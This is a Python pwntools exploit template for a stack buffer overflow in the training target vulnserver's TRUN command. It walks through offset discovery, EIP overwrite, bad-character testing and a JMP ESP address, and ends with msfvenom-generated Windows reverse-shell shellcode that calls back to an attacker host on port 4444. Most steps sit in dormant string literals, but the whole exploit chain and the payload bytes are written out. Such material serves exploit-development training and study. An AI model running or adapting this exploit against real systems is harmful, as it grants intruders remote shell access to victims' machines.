#!/usr/bin/python3
from pwn import *
from termcolor import colored
"""
badchars = (
"\x00\x01\x02\x03\x04\x05\x06\x07"
"\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f"
"\x10\x11\x12\x13\x14\x15\x16\x17"
"\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27"
"\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f"
"\x30\x31\x32\x33\x34\x35\x36\x37"
"\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"
"\x40\x41\x42\x43\x44\x45\x46\x47"
"\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f"
"\x50\x51\x52\x53\x54\x55\x56\x57"
"\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67"
"\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f"
"\x70\x71\x72\x73\x74\x75\x76\x77"
"\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87"
"\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f"
"\x90\x91\x92\x93\x94\x95\x96\x97"
"\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7"
"\xa8\xa9\xaa\xab\xac\xad\xae\xaf"
"\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7"
"\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7"
"\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf"
"\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7"
"\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7"
"\xe8\xe9\xea\xeb\xec\xed\xee\xef"
"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7"
"\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
"""
# Address and port of the vulnserver target this template talks to.
rhost: str = "192.168.130.131"
rport: int = 8080
# First line the server is expected to send after a connect; check_connection()
# checks the received banner against it before anything else is sent.
welcome_message: str = "Welcome to Vulnerable Server! Enter HELP for help."
# Not referenced anywhere in this file's visible code.
debug_msg: bool = True
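def _welcome_matches(banner, expected):
    """Return True when the received banner line contains the expected greeting.

    Args:
        banner: the first line read from the server, as ``bytes`` (what
            pwntools' ``recvline`` returns) or ``str``.
        expected: the greeting the server is supposed to send.

    Bytes are decoded leniently (undecodable bytes become U+FFFD) and the
    line terminator is stripped, so a banner that ends in CR/LF still matches.
    """
    if isinstance(banner, bytes):
        banner = banner.decode("utf-8", errors="replace")
    return expected in banner.strip()


def check_connection():
    """Verify the target is reachable and greets with the expected banner.

    Opens a single connection to ``rhost:rport``, reads the first line and
    checks it against the module-level ``welcome_message``. Exits the process
    with status 1 when the connection fails, the read fails, or the banner is
    not the expected one, so the later steps never run against an unexpected
    service.
    """
    import sys

    try:
        r = remote(rhost, rport, ssl=False)
        try:
            banner = r.recvline()
        finally:
            # Close even when the read fails so the socket is not leaked.
            r.close()
    except Exception:  # narrower than the bare except: KeyboardInterrupt still propagates
        print("Server not running. Closing fuzzer.")
        sys.exit(1)
    # The original compared str(bytes) against the expected text with
    # str.find(), whose -1 "not found" result is truthy, so the check could
    # never fail; compare the decoded line instead.
    if not _welcome_matches(banner, welcome_message):
        print("Welcome message not understood. Closing fuzzer.")
        sys.exit(1)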
def exploit():
    """Walk through the stack-overflow workflow template for the vulnserver target.

    This is a template, not a finished script: only the plain assignments
    below execute. Every step that builds and sends a buffer sits inside a
    triple-quoted string, which is an inert expression statement, so nothing
    is sent over the network until a step is taken out of its string. The
    placeholder values (``offset = 0``, a single NUL byte for ``badchars``,
    an all-zero ``jmp_address``) are meant to be replaced with the values
    found in the earlier steps.
    """
    # Command vulnerable to the buffer overflow
    command = "TRUN /.:/"
    # Buffer size
    buffer_size = 2111
    #### Offset: find the position that overwrites EIP (offset)
    # Dormant step (string literal, not executed).
    """
    # Generar patrón único
    cyclic_pattern = (cyclic(buffer_size).decode("utf-8"))
    # Enviar patron
    buffer = ""
    buffer = command + cyclic_pattern
    print(colored('\n>>>> Sending cyclic pattern...', 'yellow'))
    print(colored('>>>> Buffer size: ', 'yellow') + str(len(buffer)) + "\n")
    r = remote(rhost, rport, ssl=False)
    r.send(buffer)
    r.recvline()
    r.close()
    exit(0)
    # Identificar offset (convertir valor hex de EIP)
    #
    # ipython> from pwn import *
    # ipython> cyclic_find(0x<Valor de EIP>)
    #
    """
    # Offset (placeholder: still 0 until the step above has been run)
    offset = 0
    ### -------------------------------------------------------------- ###
    ### -------------------------------------------------------------- ###
    #### Offset: verify that EIP is overwritten correctly
    #### EIP must contain 42424242 => "BBBB"
    # Dormant step (string literal, not executed).
    """
    # Crear nuevo buffer
    buffer = ""
    buffer = command + ("A" * offset) + ("B" * 4) + ("C" * (buffer_size - 4))
    # Enviar nuevo buffer
    print(colored('\n>>>> Sending \"BBBB\" buffer to validate EIP writing...', 'cyan'))
    print(colored('>>>> Buffer size: ', 'cyan') + str(len(buffer)) + "\n")
    r = remote(rhost, rport, ssl=False)
    r.send(buffer)
    r.recvline()
    r.close()
    exit(0)
    # Verificar visualmente en IMMUNITY que se escribió EIP con "BBBB"
    # Immunity GUI
    """
    ### -------------------------------------------------------------- ###
    ### -------------------------------------------------------------- ###
    #### BadChars: find bad characters
    # Dormant step (string literal, not executed).
    """
    # >>>>>>>>>>
    # Crear nuevo buffer
    badchars = (
        "\x00\x01\x02\x03\x04\x05\x06\x07"
        "\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f"
        "\x10\x11\x12\x13\x14\x15\x16\x17"
        "\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
        "\x20\x21\x22\x23\x24\x25\x26\x27"
        "\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f"
        "\x30\x31\x32\x33\x34\x35\x36\x37"
        "\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"
        "\x40\x41\x42\x43\x44\x45\x46\x47"
        "\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f"
        "\x50\x51\x52\x53\x54\x55\x56\x57"
        "\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
        "\x60\x61\x62\x63\x64\x65\x66\x67"
        "\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f"
        "\x70\x71\x72\x73\x74\x75\x76\x77"
        "\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
        "\x80\x81\x82\x83\x84\x85\x86\x87"
        "\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f"
        "\x90\x91\x92\x93\x94\x95\x96\x97"
        "\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
        "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7"
        "\xa8\xa9\xaa\xab\xac\xad\xae\xaf"
        "\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7"
        "\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
        "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7"
        "\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf"
        "\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7"
        "\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
        "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7"
        "\xe8\xe9\xea\xeb\xec\xed\xee\xef"
        "\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7"
        "\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
    )
    ### buffer = command + badchars + "C" * (buffer_size - len(badchars))
    buffer = ""
    buffer = command + ("A" * offset) + ("B" * 4) + badchars
    # Enviar badchars
    print(colored('\n>>>> Sending badchars...', 'green'))
    print(colored('>>>> Buffer size: ', 'green') + str(len(buffer)) + "\n")
    r = remote(rhost, rport, ssl=False)
    r.send(buffer)
    r.recvline()
    r.close()
    exit(0)
    # Verificar visualmente en IMMUNITY los bytes faltantes
    # Immunity GUI
    # Volver a repeter hasta que no falte niniguno
    # <<<<<<<<<<<<<
    """
    # Badchars (placeholder: only NUL is listed until the step above has been run)
    badchars = "\x00"
    ### -------------------------------------------------------------- ###
    ### -------------------------------------------------------------- ###
    #### Find a safe module and the address of the "JMP ESP" instruction
    #### The address of "JMP ESP" is what gets written into EIP, so that
    #### EIP jumps to "JMP ESP" and that instruction in turn jumps to the
    #### code found in the ESP register (the shellcode)
    # Dormant step (string literal, not executed).
    """
    # Desde ipython
    # ipython> asm("jmp esp")
    # Desde IMMUNITY, ejecutar mona.py
    # !mona modules
    # !mona find -s "\xff\xe4" -m <secure_module.dll>
    # Resultado: 0x625011af (este valor se debe invertir así: "\xaf\x11\x50\x62")
    # Enviar la dirección de momoria de "JMP ESP" a EIP y validar
    jmp_address = "\xaf\x11\x50\x62"
    buffer = ""
    buffer = command + ("A" * offset) + jmp_address + "\x90" * 100
    # Enviar badchars
    print(colored('\n>>>> Sending badchars...', 'magenta'))
    print(colored('>>>> Buffer size: ', 'magenta') + str(len(buffer)) + "\n")
    r = remote(rhost, rport, ssl=False)
    r.send(buffer)
    r.recvline()
    r.close()
    exit(0)
    """
    # JMP ESP address (placeholder: all-zero bytes until the step above has been run)
    jmp_address = "\x00\x00\x00\x00"
    ### -------------------------------------------------------------- ###
    ### -------------------------------------------------------------- ###
    #### Generate "reverse shell" shellcode and exploit the BoF
    # Dormant final step (string literal, not executed); the only step that
    # does not end with exit(0).
    """
    ###
    ###
    ## MFSVENOM Template
    # msfvenom --arch x86 --platform windows \
    # --payload windows/shell_reverse_tcp \
    # LHOST=<AttackerIP> LPORT=4444 \
    # EXITFUNC=thread --format c --bad-chars '\x00' --smallest
    ###
    #### Armar exploit
    ###
    # msfvenom --arch x86 --platform windows --payload windows/shell_reverse_tcp LHOST=192.168.130.130 LPORT=4444 EXITFUNC=thread --format c --bad-chars '\x00' --smallest
    shellcode = (
        "\x2b\xc9\x66\xb9\x43\x01\xe8\xff\xff\xff\xff\xc1\x5e\x30\x4c"
        "\x0e\x07\xe2\xfa\xfd\xea\x81\x04\x05\x06\x67\x81\xec\x3b\xcb"
        "\x68\x86\x5e\x3f\x9b\x43\x1e\x98\x46\x01\x9d\x65\x30\x16\xad"
        "\x51\x3a\x2c\xe1\xb3\x1c\x40\x5e\x21\x08\x05\xe7\xe8\x25\x28"
        "\xed\xc9\xde\x7f\x79\xa4\x62\x21\xb9\x79\x08\xbe\x7a\x26\x40"
        "\xda\x72\x3a\xed\x6c\xb5\x66\x60\x40\x91\xc8\x0d\x5d\xa5\x7d"
        "\x01\xc2\x7e\xc0\x4d\x9b\x7f\xb0\xfc\x90\x9d\x5e\x55\x92\x6e"
        "\xb7\x2d\xaf\x59\x26\xa4\x66\x23\x7b\x15\x85\x3a\xe8\x3c\x41"
        "\x67\xb4\x0e\xe2\x66\x20\xe7\x35\x72\x6e\xa3\xfa\x76\xf8\x75"
        "\xa5\xff\x33\x5c\x5d\x21\x20\x1d\x24\x24\x2e\x7f\x61\xdd\xdc"
        "\xde\x0e\x94\x6c\x05\xd4\xe2\xb8\xbe\x8d\x8e\xe7\xe7\xe2\xa0"
        "\xcc\xc0\xfd\xda\xe0\xbe\x9e\x65\x4e\x24\x0d\x9f\x9f\xa0\x88"
        "\x66\xf7\xf4\xcd\x8f\x27\xc3\xa9\x55\x7e\xfc\xfd\xfe\xff\xf0"
        "\xe1\xf2\xe3\xdc\x5f\xb9\x68\x58\x46\x6f\x2c\xd6\xb8\xd6\x7f"
        "\x68\x43\x40\xab\xc6\xc5\xd7\x9b\x41\x2f\xa0\xdb\x9a\x9a\xa6"
        "\x56\x75\xa5\xb3\x2c\x01\x50\x16\xa3\xd4\x26\x94\xd3\xa9\x31"
        "\xb6\x2f\x55\x43\xb4\x1c\x31\x8d\x85\x8a\x8c\xe9\x63\x08\xbb"
        "\xba\xb9\xde\x06\x9b\xe0\xaa\xa2\x17\x0b\x91\x3f\xbd\xde\xc7"
        "\xfd\xfc\x73\xbb\x24\x11\xc4\x03\x40\x51\x56\x51\x5e\x5f\x4c"
        "\x5d\x42\x5b\x58\x5c\x46\x79\x6b\xdf\x2b\x93\xe9\xc2\x91\xf9"
        "\x54\x4d\x5a\xe2\x2e\x77\x28\xa6\x3f\x43\xdb\xf0\x9d\xc7\x35"
        "\x03\x20\x43\x8a\xb8\x93\xb2\xcf\xe4\x0e\x35\x48\x3f\xb6\xcc"
        "\xd8\x4c\x3f\x80\x7b\x2e\x4c\x50\x2a\x41\x11\xbc\x91"
    )
    nops = "\x90"
    buffer = ""
    buffer = command + ("A" * offset) + jmp_address + nops * 20 + shellcode
    # Enviar exploit
    print(colored('\n>>>> Sending shellcode...', 'red', attrs=[ 'bold']), end='')
    for i in range(20):
        print(colored('.', 'red', attrs=[ 'bold']), end='')
        sleep(0.1)
    print("")
    r = remote(rhost, rport, ssl=False)
    r.send(buffer)
    r.recvline()
    r.close()
    print(colored('\nDone! Happy hacking ;)', 'green', attrs=[ 'bold']))
    """
if __name__ == "__main__":
    # Script entry point: abort early unless the target answers with the
    # expected banner, then run the template steps in order.
    for step in (check_connection, exploit):
        step()